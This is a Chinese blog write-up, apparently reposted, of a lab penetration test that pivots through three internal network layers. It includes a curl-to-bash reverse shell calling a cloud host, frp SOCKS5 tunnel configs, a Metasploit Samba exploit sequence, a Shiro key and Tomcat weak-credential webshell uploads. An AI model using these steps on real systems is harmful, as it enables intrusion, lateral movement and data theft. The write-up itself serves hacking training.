记一次内网靶机实战
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记一次内网靶机实战相关的知识,希望对你有一定的参考价值。
文章目录
0x00 边界服务器
访问http://1.xx.xx.xx.:xx7/login
发现rememberMe字段
工具检测
shiro 反序列化,上传内存马
[++] 存在shiro框架!
[++] 找到key:kPH+bIxk5D2deZiIxcaaaA==
[+] 爆破结束
[-] 测试:CommonsBeanutils1 回显方式: AllEcho
[-] 测试:CommonsBeanutils1 回显方式: TomcatEcho
[++] 发现构造链:CommonsBeanutils1 回显方式: SpringEcho
[++] 请尝试进行功能区利用。
远程连接
反弹shell到云主机,使用curl反弹shell
curl http://82.xx.xx.xx:xx0/bash.html|bash
0x01 一层网络
0x01-01 fscan内网扫描
通过上传fscan,扫描发现存活主机
10.10.135.1:22 open
10.10.135.35:139 open
10.10.135.35:445 open
10.10.135.190:8080 open
10.10.135.25:8080 open
10.10.135.66:3306 open
[+] mysql:10.10.135.66:3306:root 123456
[*] 10.10.135.35 (Windows 6.1)
[*] WebTitle:http://10.10.135.190:8080 code:200 len:52 title:None
[*] WebTitle:http://10.10.135.25:8080 code:302 len:0 title:None 跳转url: http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2
[*] WebTitle:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 code:200 len:2608 title:Login Page
[+] InfoScan:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 [Shiro]
[+] http://10.10.135.190:8080 poc-yaml-struts2_046-1
[+] http://10.10.135.190:8080 poc-yaml-struts2_045 poc1
0x01-02 配置frp设置socks5代理
目标机(1.xx.xx.xx4)frpc
配置远程连接的IP地址(82.xx.xx.xx),通过tcp协议的socks5的7777端口进行通信传输
frpc.ini
------------------------------------
[common]
server_addr = 82.1xx.xx.xx1
server_port = 7077
[plugin_socks5]
type = tcp #协议
remote_port = 9566 #指定远程服务器的端口
plugin = socks5
------------------------------------
启动客户端
chmod +x frpc
chmod +x frpc.ini
exectue -f ./frpc -c ./frpc.ini
vps(82.xx.xx.xx1)配置frps
frps.ini
-----------------------------------
[common]
bind_port = 7077 #必要,frp服务端端口
------------------------------------
启动服务端
chmod +x frps
chmod +x frps.ini
./frps -c ./frps.ini
踩坑1:忘记在防火墙添加策略,导致失败
frp通道建立成功
配置好代理
0x01-03 访问内网的(10.10.135.66)
10.10.135.66:3306:root 123456
0x01-04 访问内网的(10.10.135.35)
10.10.135.35 (Windows 6.1)
发现内网存活主机 开展信息搜集,发现该主机系统为linux ,开放139、445端口,其中445端
口为samba 4.6.3 通过search samba 4.6 发现存在漏洞
search samba 4.6
use exploit/linux/samba/is_known_pipename
set rhosts 10.10.135.35
run
0x01-05 访问内网的(10.10.135.190)
structs漏洞
http://10.10.135.190:8080 poc-yaml-struts2_046-1
http://10.10.135.190:8080 poc-yaml-struts2_045 poc1
配置代理,通过proxifer配置socks5代理,把电脑代理到内网,然后使用struts2工具去探测内网漏洞
执行命令
给网站目录下上传文件jsp文件,下载Godzilla,配置代理,成功连接
0x02二层网络
0x02-01 内网扫描
./fscan_amd64 -h 172.16.15.0/24 -np
172.16.15.115:3306 open
172.16.15.111:3306 open
172.16.15.88:139 open
172.16.15.145:445 open
172.16.15.88:445 open
172.16.15.66:8009 open
172.16.15.87:8080 open
172.16.15.66:8080 open
172.16.15.187:6379 open
172.16.15.145:139 open
[+] mysql:172.16.15.111:3306:root 123456
[+] Redis:172.16.15.187:6379 unauthorized file:/data/dump.rdb
[+] mysql:172.16.15.115:3306:root 123456
[*] WebTitle:http://172.16.15.66:8080 code:200 len:11230 title:Apache Tomcat/8.0.43
[*] WebTitle:http://172.16.15.87:8080 code:200 len:52 title:None
[*] 172.16.15.145 (Windows 6.1)
[*] 172.16.15.88 (Windows 6.1)
[+] http://172.16.15.87:8080 poc-yaml-struts2_045 poc1
[+] http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [username tomcat password tomcat]
此时的获取的内网信息
0x02-02 添加路由
在边界服务器1.xx.xx.xx:xx7/10.10.135.25上添加路由配置,使得 边界服务器与172.16.15.0/24网段连通
0x02-03 访问内网的(172.16.15.111)
mysql:172.16.15.111:3306:root 123456
0x02-04 访问内网的(172.16.15.115)
172.16.15.115:3306:root 123456
0x02-05 访问内网的(172.16.15.187)
172.16.15.187:6379 unauthorized file:/data/dump.rdb
0x02-06 访问内网的(172.16.15.88)
172.16.15.88 (Windows 6.1)
0x02-07 访问内网的(172.16.15.145)
172.16.15.145 (Windows 6.1)
0x02-08 tomcat任意文件上传(172.16.15.66:8080)
http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [username tomcat password tomcat]
burp 设置socks5代理
下载冰蝎,然后shell,jsp,进行压缩,生成shell.zip,手动更改后缀shell.war,直接进行文件上传
访问连接
http://172.16.15.66:8080//shell/shell.jsp
rebeyond
进行反弹shell
发现是双网卡
0x03 三层服务器
0x03-01 内网扫描
./fscan_amd64 -h 192.168.13.0/24
start infoscan
(icmp) Target 192.168.13.106 is alive
(icmp) Target 192.168.13.1 is alive
(icmp) Target 192.168.13.55 is alive
(icmp) Target 192.168.13.56 is alive
(icmp) Target 192.168.13.203 is alive
[*] Icmp alive hosts len is: 5
192.168.13.203:80 open
192.168.13.106:8080 open
192.168.13.56:5432 open
192.168.13.55:3306 open
192.168.13.106:8009 open
192.168.13.1:22 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle:http://192.168.13.106:8080 code:200 len:11230 title:Apache Tomcat/8.0.43
[+] mysql:192.168.13.55:3306:root 123456
[+] Postgres:192.168.13.56:5432:postgres postgres
[*] WebTitle:http://192.168.13.203 code:302 len:312 title:Redirecting to /core/install.php 跳转url: http://192.168.13.203/core/install.php
[+] http://192.168.13.106:8080/manager/html poc-yaml-tomcat-manager-weak [username tomcat password tomcat]
已完成 5/6 [-] ssh 192.168.13.1:22 root 123qwe ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 5/6 [-] ssh 192.168.13.1:22 root Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 5/6 [-] ssh 192.168.13.1:22 admin admin@123#4 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
此时的内网信息收集
0x03-02 添加路由
0x03-03 访问内网的(192.168.13.55)
mysql:192.168.13.55:3306:root 123456
0x03-04 访问内网的(192.168.13.56)
Postgres:192.168.13.56:5432:postgres postgres
0x03-05 访问内网的(192.168.13.203)
http://192.168.13.203/core/install.php
查看drupal8.5.0的漏洞
0x04 总结
0x04-01 网络拓扑
0x04-01 漏洞知识点
1、shiro反序列化漏洞
2、strut2漏洞
3、Drupal漏洞
4、内网代理工具
5、数据库连接工具
6、window的samba漏洞
7、viper的使用
摘抄
很多人都曾梦想做一番大事业,但其实一点点小事累积就成了大事,任何大的成就也都是累积的结果,这就是累积定律。
如果你想获得成长,就从认真完成手头的小任务开始;如果你想拥有一个好身材,就从慢跑1公里开始;如果你想有好的文笔,就从看一本书开始。你想成为一个什么样的人,想过什么样的生活,其实都取决于你每一个决定。
任何事情只要开始就不晚,人生的路,每一步都算数。做你想做的事,努力成为你想成为的人,就从现在开始行动吧。
------累积定律
以上是关于记一次内网靶机实战的主要内容,如果未能解决你的问题,请参考以下文章